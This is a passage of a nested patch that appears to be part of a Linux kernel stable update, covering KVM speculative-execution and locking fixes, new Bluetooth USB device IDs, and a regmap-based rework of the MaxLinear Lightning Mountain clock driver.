+-	if (to_svm(vcpu)->vmcb->control.exit_code == SVM_EXIT_MSR &&
+-	    to_svm(vcpu)->vmcb->control.exit_info_1)
++	struct vmcb_control_area *control = &to_svm(vcpu)->vmcb->control;
++
++	/*
++	 * Note, the next RIP must be provided as SRCU isn't held, i.e. KVM
++	 * can't read guest memory (dereference memslots) to decode the WRMSR.
++	 */
++	if (control->exit_code == SVM_EXIT_MSR && control->exit_info_1 &&
++	    nrips && control->next_rip)
+ 		return handle_fastpath_set_msr_irqoff(vcpu);
+ 
+ 	return EXIT_FASTPATH_NONE;
+diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
+index 10c63b1bf92fa..df8995977ec2d 100644
+--- a/arch/x86/kvm/vmx/nested.c
++++ b/arch/x86/kvm/vmx/nested.c
+@@ -4767,6 +4767,17 @@ void nested_vmx_vmexit(struct kvm_vcpu *vcpu, u32 vm_exit_reason,
+ 
+ 	vmx_switch_vmcs(vcpu, &vmx->vmcs01);
+ 
++	/*
++	 * If IBRS is advertised to the vCPU, KVM must flush the indirect
++	 * branch predictors when transitioning from L2 to L1, as L1 expects
++	 * hardware (KVM in this case) to provide separate predictor modes.
++	 * Bare metal isolates VMX root (host) from VMX non-root (guest), but
++	 * doesn't isolate different VMCSs, i.e. in this case, doesn't provide
++	 * separate modes for L2 vs L1.
++	 */
++	if (guest_cpuid_has(vcpu, X86_FEATURE_SPEC_CTRL))
++		indirect_branch_prediction_barrier();
++
+ 	/* Update any VMCS fields that might have changed while L2 ran */
+ 	vmcs_write32(VM_EXIT_MSR_LOAD_COUNT, vmx->msr_autoload.host.nr);
+ 	vmcs_write32(VM_ENTRY_MSR_LOAD_COUNT, vmx->msr_autoload.guest.nr);
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 4ae248e87f5ed..95ed874fbbcc3 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -1348,8 +1348,10 @@ void vmx_vcpu_load_vmcs(struct kvm_vcpu *vcpu, int cpu,
+ 
+ 		/*
+ 		 * No indirect branch prediction barrier needed when switching
+-		 * the active VMCS within a guest, e.g. on nested VM-Enter.
+-		 * The L1 VMM can protect itself with retpolines, IBPB or IBRS.
++		 * the active VMCS within a vCPU, unless IBRS is advertised to
++		 * the vCPU.  To minimize the number of IBPBs executed, KVM
++		 * performs IBPB on nested VM-Exit (a single nested transition
++		 * may switch the active VMCS multiple times).
+ 		 */
+ 		if (!buddy || WARN_ON_ONCE(buddy->vmcs != prev))
+ 			indirect_branch_prediction_barrier();
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 05ca303d7fd98..68827b8dc37a5 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -8860,7 +8860,9 @@ int x86_emulate_instruction(struct kvm_vcpu *vcpu, gpa_t cr2_or_gpa,
+ 						  write_fault_to_spt,
+ 						  emulation_type))
+ 				return 1;
+-			if (ctxt->have_exception) {
++
++			if (ctxt->have_exception &&
++			    !(emulation_type & EMULTYPE_SKIP)) {
+ 				/*
+ 				 * #UD should result in just EMULATION_FAILED, and trap-like
+ 				 * exception should not be encountered during decode.
+diff --git a/arch/x86/kvm/xen.c b/arch/x86/kvm/xen.c
+index f3098c0e386a8..a58a426e6b1c0 100644
+--- a/arch/x86/kvm/xen.c
++++ b/arch/x86/kvm/xen.c
+@@ -1757,18 +1757,42 @@ static int kvm_xen_eventfd_deassign(struct kvm *kvm, u32 port)
+ 
+ static int kvm_xen_eventfd_reset(struct kvm *kvm)
+ {
+-	struct evtchnfd *evtchnfd;
++	struct evtchnfd *evtchnfd, **all_evtchnfds;
+ 	int i;
++	int n = 0;
+ 
+ 	mutex_lock(&kvm->lock);
++
++	/*
++	 * Because synchronize_srcu() cannot be called inside the
++	 * critical section, first collect all the evtchnfd objects
++	 * in an array as they are removed from evtchn_ports.
++	 */
++	idr_for_each_entry(&kvm->arch.xen.evtchn_ports, evtchnfd, i)
++		n++;
++
++	all_evtchnfds = kmalloc_array(n, sizeof(struct evtchnfd *), GFP_KERNEL);
++	if (!all_evtchnfds) {
++		mutex_unlock(&kvm->lock);
++		return -ENOMEM;
++	}
++
++	n = 0;
+ 	idr_for_each_entry(&kvm->arch.xen.evtchn_ports, evtchnfd, i) {
++		all_evtchnfds[n++] = evtchnfd;
+ 		idr_remove(&kvm->arch.xen.evtchn_ports, evtchnfd->send_port);
+-		synchronize_srcu(&kvm->srcu);
++	}
++	mutex_unlock(&kvm->lock);
++
++	synchronize_srcu(&kvm->srcu);
++
++	while (n--) {
++		evtchnfd = all_evtchnfds[n];
+ 		if (!evtchnfd->deliver.port.port)
+ 			eventfd_ctx_put(evtchnfd->deliver.eventfd.ctx);
+ 		kfree(evtchnfd);
+ 	}
+-	mutex_unlock(&kvm->lock);
++	kfree(all_evtchnfds);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index 6beafd62d7226..93e9ae928e4e8 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -316,6 +316,90 @@ static const struct usb_device_id blacklist_table[] = {
+ 	{ USB_DEVICE(0x0489, 0xe0d0), .driver_info = BTUSB_QCA_WCN6855 |
+ 						     BTUSB_WIDEBAND_SPEECH |
+ 						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x10ab, 0x9108), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x10ab, 0x9109), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x10ab, 0x9208), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x10ab, 0x9209), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x10ab, 0x9308), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x10ab, 0x9408), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x10ab, 0x9508), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x10ab, 0x9509), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x10ab, 0x9608), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x10ab, 0x9609), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x10ab, 0x9f09), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x04ca, 0x3022), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0c7), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0c9), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0ca), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0cb), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0ce), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0de), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0df), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0e1), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0ea), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0ec), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x04ca, 0x3023), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x04ca, 0x3024), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x04ca, 0x3a22), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x04ca, 0x3a24), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x04ca, 0x3a26), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x04ca, 0x3a27), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
+ 
+ 	/* QCA WCN785x chipset */
+ 	{ USB_DEVICE(0x0cf3, 0xe700), .driver_info = BTUSB_QCA_WCN6855 |
+diff --git a/drivers/clk/x86/Kconfig b/drivers/clk/x86/Kconfig
+index 69642e15fcc1f..ced99e082e3dd 100644
+--- a/drivers/clk/x86/Kconfig
++++ b/drivers/clk/x86/Kconfig
+@@ -1,8 +1,9 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+ config CLK_LGM_CGU
+ 	depends on OF && HAS_IOMEM && (X86 || COMPILE_TEST)
++	select MFD_SYSCON
+ 	select OF_EARLY_FLATTREE
+ 	bool "Clock driver for Lightning Mountain(LGM) platform"
+ 	help
+-	  Clock Generation Unit(CGU) driver for Intel Lightning Mountain(LGM)
+-	  network processor SoC.
++	  Clock Generation Unit(CGU) driver for MaxLinear's x86 based
++	  Lightning Mountain(LGM) network processor SoC.
+diff --git a/drivers/clk/x86/clk-cgu-pll.c b/drivers/clk/x86/clk-cgu-pll.c
+index 3179557b5f784..409dbf55f4cae 100644
+--- a/drivers/clk/x86/clk-cgu-pll.c
++++ b/drivers/clk/x86/clk-cgu-pll.c
+@@ -1,8 +1,9 @@
+ // SPDX-License-Identifier: GPL-2.0
+ /*
++ * Copyright (C) 2020-2022 MaxLinear, Inc.
+  * Copyright (C) 2020 Intel Corporation.
+- * Zhu YiXin <yixin.zhu@intel.com>
+- * Rahul Tanwar <rahul.tanwar@intel.com>
++ * Zhu Yixin <yzhu@maxlinear.com>
++ * Rahul Tanwar <rtanwar@maxlinear.com>
+  */
+ 
+ #include <linux/clk-provider.h>
+@@ -40,13 +41,10 @@ static unsigned long lgm_pll_recalc_rate(struct clk_hw *hw, unsigned long prate)
+ {
+ 	struct lgm_clk_pll *pll = to_lgm_clk_pll(hw);
+ 	unsigned int div, mult, frac;
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&pll->lock, flags);
+ 	mult = lgm_get_clk_val(pll->membase, PLL_REF_DIV(pll->reg), 0, 12);
+ 	div = lgm_get_clk_val(pll->membase, PLL_REF_DIV(pll->reg), 18, 6);
+ 	frac = lgm_get_clk_val(pll->membase, pll->reg, 2, 24);
+-	spin_unlock_irqrestore(&pll->lock, flags);
+ 
+ 	if (pll->type == TYPE_LJPLL)
+ 		div *= 4;
+@@ -57,12 +55,9 @@ static unsigned long lgm_pll_recalc_rate(struct clk_hw *hw, unsigned long prate)
+ static int lgm_pll_is_enabled(struct clk_hw *hw)
+ {
+ 	struct lgm_clk_pll *pll = to_lgm_clk_pll(hw);
+-	unsigned long flags;
+ 	unsigned int ret;
+ 
+-	spin_lock_irqsave(&pll->lock, flags);
+ 	ret = lgm_get_clk_val(pll->membase, pll->reg, 0, 1);
+-	spin_unlock_irqrestore(&pll->lock, flags);
+ 
+ 	return ret;
+ }
+@@ -70,15 +65,13 @@ static int lgm_pll_is_enabled(struct clk_hw *hw)
+ static int lgm_pll_enable(struct clk_hw *hw)
+ {
+ 	struct lgm_clk_pll *pll = to_lgm_clk_pll(hw);
+-	unsigned long flags;
+ 	u32 val;
+ 	int ret;
+ 
+-	spin_lock_irqsave(&pll->lock, flags);
+ 	lgm_set_clk_val(pll->membase, pll->reg, 0, 1, 1);
+-	ret = readl_poll_timeout_atomic(pll->membase + pll->reg,
+-					val, (val & 0x1), 1, 100);
+-	spin_unlock_irqrestore(&pll->lock, flags);
++	ret = regmap_read_poll_timeout_atomic(pll->membase, pll->reg,
++					      val, (val & 0x1), 1, 100);
++
+ 
+ 	return ret;
+ }
+@@ -86,11 +79,8 @@ static int lgm_pll_enable(struct clk_hw *hw)
+ static void lgm_pll_disable(struct clk_hw *hw)
+ {
+ 	struct lgm_clk_pll *pll = to_lgm_clk_pll(hw);
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&pll->lock, flags);
+ 	lgm_set_clk_val(pll->membase, pll->reg, 0, 1, 0);
+-	spin_unlock_irqrestore(&pll->lock, flags);
+ }
+ 
+ static const struct clk_ops lgm_pll_ops = {
+@@ -121,7 +111,6 @@ lgm_clk_register_pll(struct lgm_clk_provider *ctx,
+ 		return ERR_PTR(-ENOMEM);
+ 
+ 	pll->membase = ctx->membase;
+-	pll->lock = ctx->lock;
+ 	pll->reg = list->reg;
+ 	pll->flags = list->flags;
+ 	pll->type = list->type;
+diff --git a/drivers/clk/x86/clk-cgu.c b/drivers/clk/x86/clk-cgu.c
+index 33de600e0c38e..89b53f280aee0 100644
+--- a/drivers/clk/x86/clk-cgu.c
++++ b/drivers/clk/x86/clk-cgu.c
+@@ -1,8 +1,9 @@
+ // SPDX-License-Identifier: GPL-2.0
+ /*
++ * Copyright (C) 2020-2022 MaxLinear, Inc.
+  * Copyright (C) 2020 Intel Corporation.
+- * Zhu YiXin <yixin.zhu@intel.com>
+- * Rahul Tanwar <rahul.tanwar@intel.com>
++ * Zhu Yixin <yzhu@maxlinear.com>
++ * Rahul Tanwar <rtanwar@maxlinear.com>
+  */
+ #include <linux/clk-provider.h>
+ #include <linux/device.h>
+@@ -24,14 +25,10 @@
+ static struct clk_hw *lgm_clk_register_fixed(struct lgm_clk_provider *ctx,
+ 					     const struct lgm_clk_branch *list)
+ {
+-	unsigned long flags;
+ 
+-	if (list->div_flags & CLOCK_FLAG_VAL_INIT) {
+-		spin_lock_irqsave(&ctx->lock, flags);
++	if (list->div_flags & CLOCK_FLAG_VAL_INIT)
+ 		lgm_set_clk_val(ctx->membase, list->div_off, list->div_shift,
+ 				list->div_width, list->div_val);
+-		spin_unlock_irqrestore(&ctx->lock, flags);
+-	}
+ 
+ 	return clk_hw_register_fixed_rate(NULL, list->name,
+ 					  list->parent_data[0].name,
+@@ -41,33 +38,27 @@ static struct clk_hw *lgm_clk_register_fixed(struct lgm_clk_provider *ctx,
+ static u8 lgm_clk_mux_get_parent(struct clk_hw *hw)
+ {
+ 	struct lgm_clk_mux *mux = to_lgm_clk_mux(hw);
+-	unsigned long flags;
+ 	u32 val;
+ 
+-	spin_lock_irqsave(&mux->lock, flags);
+ 	if (mux->flags & MUX_CLK_SW)
+ 		val = mux->reg;
+ 	else
+ 		val = lgm_get_clk_val(mux->membase, mux->reg, mux->shift,
+ 				      mux->width);
+-	spin_unlock_irqrestore(&mux->lock, flags);
+ 	return clk_mux_val_to_index(hw, NULL, mux->flags, val);
+ }
+ 
+ static int lgm_clk_mux_set_parent(struct clk_hw *hw, u8 index)
+ {
+ 	struct lgm_clk_mux *mux = to_lgm_clk_mux(hw);
+-	unsigned long flags;
+ 	u32 val;
+ 
+ 	val = clk_mux_index_to_val(NULL, mux->flags, index);
+-	spin_lock_irqsave(&mux->lock, flags);
+ 	if (mux->flags & MUX_CLK_SW)
+ 		mux->reg = val;
+ 	else
+ 		lgm_set_clk_val(mux->membase, mux->reg, mux->shift,
+ 				mux->width, val);
+-	spin_unlock_irqrestore(&mux->lock, flags);
+ 
+ 	return 0;
+ }
+@@ -90,7 +81,7 @@ static struct clk_hw *
+ lgm_clk_register_mux(struct lgm_clk_provider *ctx,
+ 		     const struct lgm_clk_branch *list)
+ {
+-	unsigned long flags, cflags = list->mux_flags;
++	unsigned long cflags = list->mux_flags;
+ 	struct device *dev = ctx->dev;
+ 	u8 shift = list->mux_shift;
+ 	u8 width = list->mux_width;
+@@ -111,7 +102,6 @@ lgm_clk_register_mux(struct lgm_clk_provider *ctx,
+ 	init.num_parents = list->num_parents;
+ 
+ 	mux->membase = ctx->membase;
+-	mux->lock = ctx->lock;
+ 	mux->reg = reg;
+ 	mux->shift = shift;
+ 	mux->width = width;
+@@ -123,11 +113,8 @@ lgm_clk_register_mux(struct lgm_clk_provider *ctx,
+ 	if (ret)
+ 		return ERR_PTR(ret);
+ 
+-	if (cflags & CLOCK_FLAG_VAL_INIT) {
+-		spin_lock_irqsave(&mux->lock, flags);
++	if (cflags & CLOCK_FLAG_VAL_INIT)
+ 		lgm_set_clk_val(mux->membase, reg, shift, width, list->mux_val);
+-		spin_unlock_irqrestore(&mux->lock, flags);
+-	}
+ 
+ 	return hw;
+ }
+@@ -136,13 +123,10 @@ static unsigned long
+ lgm_clk_divider_recalc_rate(struct clk_hw *hw, unsigned long parent_rate)
+ {
+ 	struct lgm_clk_divider *divider = to_lgm_clk_divider(hw);
+-	unsigned long flags;
+ 	unsigned int val;
+ 
+-	spin_lock_irqsave(&divider->lock, flags);
+ 	val = lgm_get_clk_val(divider->membase, divider->reg,
+ 			      divider->shift, divider->width);
+-	spin_unlock_irqrestore(&divider->lock, flags);
+ 
+ 	return divider_recalc_rate(hw, parent_rate, val, divider->table,
+ 				   divider->flags, divider->width);
+@@ -163,7 +147,6 @@ lgm_clk_divider_set_rate(struct clk_hw *hw, unsigned long rate,
+ 			 unsigned long prate)
+ {
+ 	struct lgm_clk_divider *divider = to_lgm_clk_divider(hw);
+-	unsigned long flags;
+ 	int value;
+ 
+ 	value = divider_get_val(rate, prate, divider->table,
+@@ -171,10 +154,8 @@ lgm_clk_divider_set_rate(struct clk_hw *hw, unsigned long rate,
+ 	if (value < 0)
+ 		return value;
+ 
+-	spin_lock_irqsave(&divider->lock, flags);
+ 	lgm_set_clk_val(divider->membase, divider->reg,
+ 			divider->shift, divider->width, value);
+-	spin_unlock_irqrestore(&divider->lock, flags);
+ 
+ 	return 0;
+ }
+@@ -182,12 +163,10 @@ lgm_clk_divider_set_rate(struct clk_hw *hw, unsigned long rate,
+ static int lgm_clk_divider_enable_disable(struct clk_hw *hw, int enable)
+ {
+ 	struct lgm_clk_divider *div = to_lgm_clk_divider(hw);
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&div->lock, flags);
+-	lgm_set_clk_val(div->membase, div->reg, div->shift_gate,
+-			div->width_gate, enable);
+-	spin_unlock_irqrestore(&div->lock, flags);
++	if (div->flags != DIV_CLK_NO_MASK)
++		lgm_set_clk_val(div->membase, div->reg, div->shift_gate,
++				div->width_gate, enable);
+ 	return 0;
+ }
+ 
+@@ -213,7 +192,7 @@ static struct clk_hw *
+ lgm_clk_register_divider(struct lgm_clk_provider *ctx,
+ 			 const struct lgm_clk_branch *list)
+ {
+-	unsigned long flags, cflags = list->div_flags;
++	unsigned long cflags = list->div_flags;
+ 	struct device *dev = ctx->dev;
+ 	struct lgm_clk_divider *div;
+ 	struct clk_init_data init = {};
+@@ -236,7 +215,6 @@ lgm_clk_register_divider(struct lgm_clk_provider *ctx,
+ 	init.num_parents = 1;
+ 
+ 	div->membase = ctx->membase;
+-	div->lock = ctx->lock;
+ 	div->reg = reg;
+ 	div->shift = shift;
+ 	div->width = width;
+@@ -251,11 +229,8 @@ lgm_clk_register_divider(struct lgm_clk_provider *ctx,
+ 	if (ret)
+ 		return ERR_PTR(ret);
+ 
+-	if (cflags & CLOCK_FLAG_VAL_INIT) {
+-		spin_lock_irqsave(&div->lock, flags);
++	if (cflags & CLOCK_FLAG_VAL_INIT)
+ 		lgm_set_clk_val(div->membase, reg, shift, width, list->div_val);
+-		spin_unlock_irqrestore(&div->lock, flags);
+-	}
+ 
+ 	return hw;
+ }
+@@ -264,7 +239,6 @@ static struct clk_hw *
+ lgm_clk_register_fixed_factor(struct lgm_clk_provider *ctx,
+ 			      const struct lgm_clk_branch *list)
+ {
+-	unsigned long flags;
+ 	struct clk_hw *hw;
+ 
+ 	hw = clk_hw_register_fixed_factor(ctx->dev, list->name,
+@@ -273,12 +247,9 @@ lgm_clk_register_fixed_factor(struct lgm_clk_provider *ctx,
+ 	if (IS_ERR(hw))
+ 		return ERR_CAST(hw);
+ 
+-	if (list->div_flags & CLOCK_FLAG_VAL_INIT) {
+-		spin_lock_irqsave(&ctx->lock, flags);
++	if (list->div_flags & CLOCK_FLAG_VAL_INIT)
+ 		lgm_set_clk_val(ctx->membase, list->div_off, list->div_shift,
+ 				list->div_width, list->div_val);
+-		spin_unlock_irqrestore(&ctx->lock, flags);
+-	}
+ 
+ 	return hw;
+ }
+@@ -286,13 +257,10 @@ lgm_clk_register_fixed_factor(struct lgm_clk_provider *ctx,
+ static int lgm_clk_gate_enable(struct clk_hw *hw)
+ {
+ 	struct lgm_clk_gate *gate = to_lgm_clk_gate(hw);
+-	unsigned long flags;
+ 	unsigned int reg;
+ 
+-	spin_lock_irqsave(&gate->lock, flags);
+ 	reg = GATE_HW_REG_EN(gate->reg);
+ 	lgm_set_clk_val(gate->membase, reg, gate->shift, 1, 1);
+-	spin_unlock_irqrestore(&gate->lock, flags);
+ 
+ 	return 0;
+ }
+@@ -300,25 +268,19 @@ static int lgm_clk_gate_enable(struct clk_hw *hw)
+ static void lgm_clk_gate_disable(struct clk_hw *hw)
+ {
+ 	struct lgm_clk_gate *gate = to_lgm_clk_gate(hw);
+-	unsigned long flags;
+ 	unsigned int reg;
+ 
+-	spin_lock_irqsave(&gate->lock, flags);
+ 	reg = GATE_HW_REG_DIS(gate->reg);
+ 	lgm_set_clk_val(gate->membase, reg, gate->shift, 1, 1);
+-	spin_unlock_irqrestore(&gate->lock, flags);
+ }
+ 
+ static int lgm_clk_gate_is_enabled(struct clk_hw *hw)
+ {
+ 	struct lgm_clk_gate *gate = to_lgm_clk_gate(hw);
+ 	unsigned int reg, ret;
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&gate->lock, flags);
+ 	reg = GATE_HW_REG_STAT(gate->reg);
+ 	ret = lgm_get_clk_val(gate->membase, reg, gate->shift, 1);
+-	spin_unlock_irqrestore(&gate->lock, flags);
+ 
+ 	return ret;
+ }
+@@ -333,7 +295,7 @@ static struct clk_hw *
+ lgm_clk_register_gate(struct lgm_clk_provider *ctx,
+ 		      const struct lgm_clk_branch *list)
+ {
+-	unsigned long flags, cflags = list->gate_flags;
++	unsigned long cflags = list->gate_flags;
+ 	const char *pname = list->parent_data[0].name;
+ 	struct device *dev = ctx->dev;
+ 	u8 shift = list->gate_shift;
+@@ -354,7 +316,6 @@ lgm_clk_register_gate(struct lgm_clk_provider *ctx,
+ 	init.num_parents = pname ? 1 : 0;
+ 
+ 	gate->membase = ctx->membase;
+-	gate->lock = ctx->lock;
+ 	gate->reg = reg;
+ 	gate->shift = shift;
+ 	gate->flags = cflags;
+@@ -366,9 +327,7 @@ lgm_clk_register_gate(struct lgm_clk_provider *ctx,
+ 		return ERR_PTR(ret);
+ 
+ 	if (cflags & CLOCK_FLAG_VAL_INIT) {
+-		spin_lock_irqsave(&gate->lock, flags);
+ 		lgm_set_clk_val(gate->membase, reg, shift, 1, list->gate_val);
+-		spin_unlock_irqrestore(&gate->lock, flags);
+ 	}
+ 
+ 	return hw;
+@@ -396,8 +355,22 @@ int lgm_clk_register_branches(struct lgm_clk_provider *ctx,
+ 			hw = lgm_clk_register_fixed_factor(ctx, list);
+ 			break;
+ 		case CLK_TYPE_GATE:
+-			hw = lgm_clk_register_gate(ctx, list);
++			if (list->gate_flags & GATE_CLK_HW) {
++				hw = lgm_clk_register_gate(ctx, list);
++			} else {
++				/*
++				 * GATE_CLKs can be controlled either from
++				 * CGU clk driver i.e. this driver or directly
++				 * from power management driver/daemon. It is
++				 * dependent on the power policy/profile requirements
++				 * of the end product. To override control of gate
++				 * clks from this driver, provide NULL for this index
++				 * of gate clk provider.
++				 */
++				hw = NULL;
++			}
+ 			break;
++
+ 		default:
+ 			dev_err(ctx->dev, "invalid clk type\n");
+ 			return -EINVAL;
+@@ -443,24 +416,18 @@ lgm_clk_ddiv_recalc_rate(struct clk_hw *hw, unsigned long parent_rate)
+ static int lgm_clk_ddiv_enable(struct clk_hw *hw)
+ {
+ 	struct lgm_clk_ddiv *ddiv = to_lgm_clk_ddiv(hw);
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&ddiv->lock, flags);
+ 	lgm_set_clk_val(ddiv->membase, ddiv->reg, ddiv->shift_gate,
+ 			ddiv->width_gate, 1);
+-	spin_unlock_irqrestore(&ddiv->lock, flags);
+ 	return 0;
+ }
+ 
+ static void lgm_clk_ddiv_disable(struct clk_hw *hw)
+ {
+ 	struct lgm_clk_ddiv *ddiv = to_lgm_clk_ddiv(hw);
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&ddiv->lock, flags);
+ 	lgm_set_clk_val(ddiv->membase, ddiv->reg, ddiv->shift_gate,
+ 			ddiv->width_gate, 0);
+-	spin_unlock_irqrestore(&ddiv->lock, flags);
+ }
+ 
+ static int
+@@ -497,32 +464,25 @@ lgm_clk_ddiv_set_rate(struct clk_hw *hw, unsigned long rate,
+ {
+ 	struct lgm_clk_ddiv *ddiv = to_lgm_clk_ddiv(hw);
+ 	u32 div, ddiv1, ddiv2;
+-	unsigned long flags;
+ 
+ 	div = DIV_ROUND_CLOSEST_ULL((u64)prate, rate);
+ 
+-	spin_lock_irqsave(&ddiv->lock, flags);
+ 	if (lgm_get_clk_val(ddiv->membase, ddiv->reg, ddiv->shift2, 1)) {
+ 		div = DIV_ROUND_CLOSEST_ULL((u64)div, 5);
+ 		div = div * 2;
+ 	}
+ 
+-	if (div <= 0) {
+-		spin_unlock_irqrestore(&ddiv->lock, flags);
++	if (div <= 0)
+ 		return -EINVAL;
+-	}
+ 
+-	if (lgm_clk_get_ddiv_val(div, &ddiv1, &ddiv2)) {
+-		spin_unlock_irqrestore(&ddiv->lock, flags);
++	if (lgm_clk_get_ddiv_val(div, &ddiv1, &ddiv2))
+ 		return -EINVAL;
+-	}
+ 
+ 	lgm_set_clk_val(ddiv->membase, ddiv->reg, ddiv->shift0, ddiv->width0,
+ 			ddiv1 - 1);
+ 
+ 	lgm_set_clk_val(ddiv->membase, ddiv->reg,  ddiv->shift1, ddiv->width1,
+ 			ddiv2 - 1);
+-	spin_unlock_irqrestore(&ddiv->lock, flags);
+ 
+ 	return 0;
+ }
+@@ -533,18 +493,15 @@ lgm_clk_ddiv_round_rate(struct clk_hw *hw, unsigned long rate,
+ {
+ 	struct lgm_clk_ddiv *ddiv = to_lgm_clk_ddiv(hw);
+ 	u32 div, ddiv1, ddiv2;
+-	unsigned long flags;
+ 	u64 rate64;
+ 
+ 	div = DIV_ROUND_CLOSEST_ULL((u64)*prate, rate);
+ 
+ 	/* if predivide bit is enabled, modify div by factor of 2.5 */
+-	spin_lock_irqsave(&ddiv->lock, flags);
+ 	if (lgm_get_clk_val(ddiv->membase, ddiv->reg, ddiv->shift2, 1)) {
+ 		div = div * 2;
+ 		div = DIV_ROUND_CLOSEST_ULL((u64)div, 5);
+ 	}
+-	spin_unlock_irqrestore(&ddiv->lock, flags);
+ 
+ 	if (div <= 0)
+ 		return *prate;
+@@ -558,12 +515,10 @@ lgm_clk_ddiv_round_rate(struct clk_hw *hw, unsigned long rate,
+ 	do_div(rate64, ddiv2);
+ 
+ 	/* if predivide bit is enabled, modify rounded rate by factor of 2.5 */
+-	spin_lock_irqsave(&ddiv->lock, flags);
+ 	if (lgm_get_clk_val(ddiv->membase, ddiv->reg, ddiv->shift2, 1)) {
+ 		rate64 = rate64 * 2;
+ 		rate64 = DIV_ROUND_CLOSEST_ULL(rate64, 5);
+ 	}
